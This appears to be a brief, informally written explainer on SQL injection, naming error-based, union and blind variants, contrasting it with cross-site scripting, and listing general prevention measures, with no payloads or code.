Structured Query Language (SQL) is the most commonly used language for RDBMS. Its basically textual language that enables interaction with Db server.
SQL injection is a technique that takes advantages of nonvalidated input vulnerabilities and allow attackers to send malicious or inject SQL commands through Web app.
SQL injection => attack Db; Cross Site Scripting => attack user.
Types: Error from error many times we can get valuable information by asking Db, Union It’s used to combine the results of two or more Select SQL statement, Blind True/False.
Stored Procedures preventing SQL Injection it’s wrong!
The first step is to expose Web app that are vulnerable to attack. Attacks usually take advantage of poorly written code and poor Web site administration. To preventing these attacks you would consider; removing culprit characters/sequences; minimizing privileges; implementing consistent coding standards; firewalling the SQL Server;.
If you would like any help write to my email firstname.lastname@example.org